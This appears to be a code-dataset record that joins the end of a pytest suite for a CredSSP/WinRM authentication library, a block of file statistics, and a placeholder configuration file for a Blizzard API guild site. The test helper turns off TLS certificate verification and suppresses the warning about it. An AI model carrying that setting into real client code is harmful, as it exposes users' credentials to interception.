b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
credssp._verify_public_keys(nonce, response_key, public_key)
def test_verify_pub_key_old_mismatch(self):
credssp = CredSSPContext("", "", "")
nonce = None
response_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
with pytest.raises(AuthenticationException) as exc:
credssp._verify_public_keys(nonce, response_key, public_key)
assert str(exc.value) == "Could not verify key sent from the " \
"server, potential man in the middle attack"
def test_verify_pub_key_new(self):
credssp = CredSSPContext("", "", "")
nonce = b"\x02\xce\xee\x0c\xdf\x03\x49\x30" \
b"\xc7\x55\xd7\xdd\x4a\x8a\xda\xaf" \
b"\xeb\x7e\x78\x9d\x86\x9c\xb2\xb8" \
b"\xd7\x9f\x71\x0c\xe2\x83\x72\x4d"
response_key = b"\xde\x4f\xc6\xa6\xba\xb2\x0e\xc5" \
b"\x29\x6e\x8d\xe5\xe7\x84\xc7\x11" \
b"\xef\xb8\xe4\xd0\xc3\x39\x4f\x4b" \
b"\xb9\x64\xbd\xff\xf1\xc0\xb8\xc2"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
credssp._verify_public_keys(nonce, response_key, public_key)
def test_verify_pub_key_new_mismatch(self):
credssp = CredSSPContext("", "", "")
nonce = b"\x02\xce\xee\x0c\xdf\x03\x49\x30" \
b"\xc7\x55\xd7\xdd\x4a\x8a\xda\xaf" \
b"\xeb\x7e\x78\x9d\x86\x9c\xb2\xb8" \
b"\xd7\x9f\x71\x0c\xe2\x83\x72\x4d"
response_key = b"\xdf\x4f\xc6\xa6\xba\xb2\x0e\xc5" \
b"\x29\x6e\x8d\xe5\xe7\x84\xc7\x11" \
b"\xef\xb8\xe4\xd0\xc3\x39\x4f\x4b" \
b"\xb9\x64\xbd\xff\xf1\xc0\xb8\xc2"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
with pytest.raises(AuthenticationException) as exc:
credssp._verify_public_keys(nonce, response_key, public_key)
assert str(exc.value) == "Could not verify key sent from the " \
"server, potential man in the middle attack"
def test_get_encrypted_credentials(self):
class FakeContext(object):
def __init__(self):
self.username = "domain\\username"
self.password = "password"
def wrap(self, data):
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
expected = b"\x30\x52" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa2\x4b" \
b"\x04\x49" \
b"\x30\x43" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x01" \
b"\xa1\x3c" \
b"\x04\x3a" \
b"\x30\x38" \
b"\xa0\x0e" \
b"\x04\x0c" \
b"\x64\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00" \
b"\xa1\x12" \
b"\x04\x10" \
b"\x75\x00\x73\x00\x65\x00\x72\x00" \
b"\x6e\x00\x61\x00\x6d\x00\x65\x00" \
b"\xa2\x12" \
b"\x04\x10" \
b"\x70\x00\x61\x00\x73\x00\x73\x00" \
b"\x77\x00\x6f\x00\x72\x00\x64\x00" \
b"\x00\x00\x00\x00"
actual = credssp._get_encrypted_credentials(context)
assert actual == expected
class TestHttpCredSSPAuth(object):
def test_check_credssp_supported(self):
response = requests.Response()
response.headers['www-authenticate'] = "CredSSP"
HttpCredSSPAuth._check_credssp_supported(response)
def test_check_credssp_supported_multiple(self):
response = requests.Response()
response.headers['www-authenticate'] = "Negotiate, Credssp, " \
"Realm='WSMan'"
HttpCredSSPAuth._check_credssp_supported(response)
def test_check_credssp_supported_fail(self):
response = requests.Response()
response.headers['www-authenticate'] = "Negotiate"
with pytest.raises(AuthenticationException) as exc:
HttpCredSSPAuth._check_credssp_supported(response)
assert str(exc.value) == "The server did not response CredSSP being " \
"an available authentication method - " \
"actual: 'Negotiate'"
def test_set_credssp_token(self):
request = requests.Request('GET', '')
expected = b"CredSSP YWJj"
HttpCredSSPAuth._set_credssp_token(request, b"abc")
actual = request.headers['Authorization']
assert actual == expected
def test_get_credssp_token(self):
pattern = re.compile(r"CredSSP ([^,\s]*)$", re.I)
response = requests.Response()
response.headers['www-authenticate'] = "CredSSP YWJj"
expected = b"abc"
actual = HttpCredSSPAuth._get_credssp_token(response, pattern,
"step 1")
assert actual == expected
def test_get_credssp_token_fail_no_header(self):
pattern = re.compile(r"CredSSP ([^,\s]*)$", re.I)
response = requests.Response()
with pytest.raises(AuthenticationException) as exc:
HttpCredSSPAuth._get_credssp_token(response, pattern, "step 1")
assert str(exc.value) == "Server did not response with a CredSSP " \
"token after step step 1 - actual ''"
def test_get_credssp_token_fail_no_credssp_token(self):
pattern = re.compile(r"CredSSP ([^,\s]*)$", re.I)
response = requests.Response()
response.headers['www-authenticate'] = "NTLM YWJj"
with pytest.raises(AuthenticationException) as exc:
HttpCredSSPAuth._get_credssp_token(response, pattern, "step 1")
assert str(exc.value) == "Server did not response with a CredSSP " \
"token after step step 1 - actual 'NTLM YWJj'"
def test_assert_warning_tls_context(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.tls_context = value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest("a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.tls_context == "a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated property tls_context, this property should be " \
"accessed using the host context, " \
"credssp['hostname'].tls_context"
def test_assert_warning_tls_connection(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.tls_connection = value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest("a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.tls_connection == "a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated property tls_connection, this property " \
"should be accessed using the host context, " \
"credssp['hostname'].tls_connection"
def test_assert_warning_cipher_negotiated(self):
class CredSSPContextTest(object):
def __init__(self, value):
class TlsConnection(object):
def __init__(self, value):
self.value = value
def get_cipher_name(self):
return self.value
self.tls_connection = TlsConnection(value)
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest("a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.cipher_negotiated == "a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated property cipher_negotiated, this property " \
"should be accessed using the host context, " \
"credssp['hostname'].tls_connection.get_cipher_name()"
def test_assert_warning_wrap(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.value = value
def wrap(self, data):
return self.value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest(b"a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.wrap(b"") == b"a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated function, wrap should be accessed using the " \
"host context wrap function, credssp['hostname'].wrap()"
def test_assert_warning_unwrap(self):
class CredSSPContextTest(object):
def __init__(self, value):
self.value = value
def unwrap(self, data):
return self.value
credssp = HttpCredSSPAuth("", "")
credssp.contexts['first'] = CredSSPContextTest(b"a")
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
assert credssp.unwrap(b"") == b"a"
assert len(w) == 1
assert w[0].category == DeprecationWarning
assert str(w[0].message) == \
"Deprecated function, unwrap should be accessed using the " \
"host context unwrap function, credssp['hostname'].unwrap()"
class TestHttpCredSSPAuthFunctional(object):
@pytest.fixture(scope='class', autouse=True)
def runner(self):
server = os.environ.get('CREDSSP_SERVER', None)
username = os.environ.get('CREDSSP_USERNAME', None)
password = os.environ.get('CREDSSP_PASSWORD', None)
if username and password and server:
return server, username, password
else:
pytest.skip("CREDSSP_USERNAME, CREDSSP_PASSWORD, CREDSSP_SERVER "
"environment variables were not set, integration tests"
" will be skipped")
def test_credssp_with_success_http(self, runner):
test_url = "http://%s:5985/wsman" % runner[0]
actual = self._send_request(test_url, runner[1], runner[2])
# try and parse the xml response, will fail if the decryption failed
ET.fromstring(actual)
def test_credssp_with_success_https(self, runner):
test_url = "https://%s:5986/wsman" % runner[0]
actual = self._send_request(test_url, runner[1], runner[2])
# try and parse the xml response, will fail if the decryption failed
ET.fromstring(actual)
def test_credssp_with_wrong_credentials(self, runner):
# Wrong password, expect NTStatusException
test_url = "https://%s:5986/wsman" % runner[0]
with pytest.raises(NTStatusException) as exc:
self._send_request(test_url, runner[1], "fakepass")
assert str(exc.value) == "Received error status from the server: " \
"(3221225581) STATUS_LOGON_FAILURE 0xc000006d"
def test_credssp_minimum_client_fail(self, runner):
test_url = "https://%s:5986/wsman" % runner[0]
with pytest.raises(AuthenticationException) as exc:
self._send_request(test_url, runner[1], runner[2],
minimum_version=100)
assert "did not meet the minimum requirements of 10" in str(exc.value)
def test_credssp_with_ntlm_explicit(self, runner):
test_url = "https://%s:5986/wsman" % runner[0]
actual = self._send_request(test_url, runner[1], runner[2],
auth_mech="ntlm")
# try and parse the xml response, will fail if the decryption failed
ET.fromstring(actual)
def _send_request(self, url, username, password, auth_mech="auto",
minimum_version=2):
"""
Sends a request to the url with the credentials specified. Will also
try send an encrypted config request and return the decrypted response
"""
from urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore', category=InsecureRequestWarning)
session = requests.Session()
session.verify = False
session.auth = HttpCredSSPAuth(username, password,
auth_mechanism=auth_mech,
minimum_version=minimum_version)
request = requests.Request('POST', url, data='')
request.headers['Content-Type'] = 'application/soap+xml;charset=UTF-8'
request.headers['User-Agent'] = 'Python WinRM client'
prepared_request = session.prepare_request(request)
response = session.send(prepared_request)
assert response.status_code == 200, \
"Failed to authenticate with CredSSP to %s" % url
response.raise_for_status()
hostname = next(iter(session.auth.contexts))
context = session.auth.contexts[hostname]
config_message = """
<s:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:i="http://schemas.microsoft.com/wbem/wsman/1/cim/interactive.xsd" xmlns:wsmanfault="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identify/1/wsmanidentity.xsd" xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy" xmlns:plugin="http://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wse="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:cert="http://schemas.microsoft.com/wbem/wsman/1/config/service/certmapping" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:m="http://schemas.microsoft.com/wbem/wsman/1/machineid" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:sub="http://schemas.microsoft.com/wbem/wsman/1/subscription" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">
<s:Header>
<p:SessionId s:mustUnderstand="false">uuid:11111111-1111-1111-1111-111111111111</p:SessionId>
<a:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Get</a:Action>
<a:To>%s</a:To>
<a:MessageID>uuid:11111111-1111-1111-1111-111111111111</a:MessageID>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<w:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/config</w:ResourceURI>
<w:Locale xml:lang="en-US" s:mustUnderstand="false"/>
<w:MaxEnvelopeSize>153600</w:MaxEnvelopeSize>
<w:OperationTimeout>PT20S</w:OperationTimeout>
<p:DataLocale xml:lang="en-US" s:mustUnderstand="false"/>
</s:Header>
<s:Body/>
</s:Envelope>""" % (url)
encrypted_message = context.wrap(config_message.encode('utf-8'))
trailer_length = self._get_trailer_length(
len(config_message), context.tls_connection.get_cipher_name()
)
message_payload = \
b"--Encrypted Boundary\r\n" \
b"\tContent-Type: application/HTTP-CredSSP-session-encrypted\r\n" \
b"\tOriginalContent: " \
b"type=application/soap+xml;charset=UTF-8;Length=" + \
str(len(config_message)).encode() + \
b"\r\n" \
b"--Encrypted Boundary\r\n" \
b"\tContent-Type: application/octet-stream\r\n" + \
struct.pack("<i", trailer_length) + encrypted_message + \
b"--Encrypted Boundary--\r\n"
request = requests.Request('POST', url, data=message_payload)
prepared_request = session.prepare_request(request)
prepared_request.headers['Content-Length'] = \
str(len(prepared_request.body))
prepared_request.headers['Content-Type'] = \
'multipart/encrypted;' \
'protocol="application/HTTP-CredSSP-session-encrypted";' \
'boundary="Encrypted Boundary"'
response = session.send(prepared_request)
assert response.status_code == 200, \
"Failed to send valid encrypted message to %s" % url
encrypted_response = response.content.split(b'--Encrypted Boundary')[2]
encrypted_payload = \
encrypted_response.split(b'application/octet-stream\r\n')[1]
decrypted_response = context.unwrap(encrypted_payload[4:])
return decrypted_response
def _get_trailer_length(self, message_length, cipher_suite):
# I really don't like the way this works but can't find a better way,
# MS allows you to get this info through the struct
# SecPkgContext_StreamSizes but there is no GSSAPI/OpenSSL equivalent
# so we need to calculate it ourselves
if re.match(r'^.*-GCM-[\w\d]*$', cipher_suite):
# We are using GCM for the cipher suite, GCM has a fixed length of
# 16 bytes for the TLS trailer making it easy for us
trailer_length = 16
else:
# We are not using GCM so need to calculate the trailer size. The
# trailer length is equal to the length of the hmac + the length of
# the padding required by the block cipher
hash_algorithm = cipher_suite.split('-')[-1]
# while there are other algorithms, SChannel doesn't support them
# as of yet https://msdn.microsoft.com/en-us/library/windows/desktop/aa374757(v=vs.85).aspx
if hash_algorithm == 'MD5':
hash_length = 16
elif hash_algorithm == 'SHA':
hash_length = 20
elif hash_algorithm == 'SHA256':
hash_length = 32
elif hash_algorithm == 'SHA384':
hash_length = 48
else:
hash_length = 0
pre_pad_length = message_length + hash_length
if "RC4" in cipher_suite:
# RC4 is a stream cipher so no padding would be added
padding_length = 0
elif "3DES" in cipher_suite:
# 3DES is a 64 bit block cipher
padding_length = 8 - (pre_pad_length % 8)
else:
# AES is a 128 bit block cipher
padding_length = 16 - (pre_pad_length % 16)
trailer_length = (pre_pad_length + padding_length) - message_length
return trailer_length
| 49.621675
| 1,280
| 0.499841
| 6,687
| 50,366
| 3.7048
| 0.094661
| 0.013563
| 0.017438
| 0.019375
| 0.786268
| 0.765561
| 0.74885
| 0.722734
| 0.703278
| 0.682974
| 0
| 0.160714
| 0.350177
| 50,366
| 1,014
| 1,281
| 49.670611
| 0.59623
| 0.031053
| 0
| 0.742373
| 0
| 0.00678
| 0.405244
| 0.304497
| 0
| 0
| 0.000615
| 0
| 0.054237
| 1
| 0.062147
| false
| 0.00904
| 0.012429
| 0.00904
| 0.106215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7deb87270455ef49cd2459acc11beb09e29c215a
| 1,707
|
py
|
Python
|
config.demo.py
|
DiegoLing33/prestij.xyz-api
|
69a11a2c93dd98975f9becbc4b8f596e4941a05f
|
[
"MIT"
] | null | null | null |
config.demo.py
|
DiegoLing33/prestij.xyz-api
|
69a11a2c93dd98975f9becbc4b8f596e4941a05f
|
[
"MIT"
] | null | null | null |
config.demo.py
|
DiegoLing33/prestij.xyz-api
|
69a11a2c93dd98975f9becbc4b8f596e4941a05f
|
[
"MIT"
] | null | null | null |
# ██╗░░░░░██╗███╗░░██╗░██████╗░░░░██████╗░██╗░░░░░░█████╗░░█████╗░██╗░░██╗
# ██║░░░░░██║████╗░██║██╔════╝░░░░██╔══██╗██║░░░░░██╔══██╗██╔══██╗██║░██╔╝
# ██║░░░░░██║██╔██╗██║██║░░██╗░░░░██████╦╝██║░░░░░███████║██║░░╚═╝█████═╝░
# ██║░░░░░██║██║╚████║██║░░╚██╗░░░██╔══██╗██║░░░░░██╔══██║██║░░██╗██╔═██╗░
# ███████╗██║██║░╚███║╚██████╔╝░░░██████╦╝███████╗██║░░██║╚█████╔╝██║░╚██╗
# ╚══════╝╚═╝╚═╝░░╚══╝░╚═════╝░░░░╚═════╝░╚══════╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝
#
# Developed by Yakov V. Panov (C) Ling • Black 2020
# @site http://ling.black
# ██╗░░░░░██╗███╗░░██╗░██████╗░░░░██████╗░██╗░░░░░░█████╗░░█████╗░██╗░░██╗
# ██║░░░░░██║████╗░██║██╔════╝░░░░██╔══██╗██║░░░░░██╔══██╗██╔══██╗██║░██╔╝
# ██║░░░░░██║██╔██╗██║██║░░██╗░░░░██████╦╝██║░░░░░███████║██║░░╚═╝█████═╝░
# ██║░░░░░██║██║╚████║██║░░╚██╗░░░██╔══██╗██║░░░░░██╔══██║██║░░██╗██╔═██╗░
# ███████╗██║██║░╚███║╚██████╔╝░░░██████╦╝███████╗██║░░██║╚█████╔╝██║░╚██╗
# ╚══════╝╚═╝╚═╝░░╚══╝░╚═════╝░░░░╚═════╝░╚══════╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝
#
# Developed by Yakov V. Panov (C) Ling • Black 2020
# @site http://ling.black
# Guild name for ex "Престиж"
guild_name = "#########"
# Server slug for ex "gordunni"
server_slug = "########"
mythic_season = 4
default_namespace = "profile-eu"
default_static_namespace = "static-eu"
# Client api
client_id = "################"
client_secret = "################"
# Blizzard
blizzard_api_url = "https://eu.api.blizzard.com"
# Static data
default_static_path = 'static'
default_items_images_path = default_static_path + "/items"
default_characters_images_path = default_static_path + "/characters"
default_files_path = default_static_path + "/files"
# Application
app_server = '127.0.0.1'
app_port = 8000
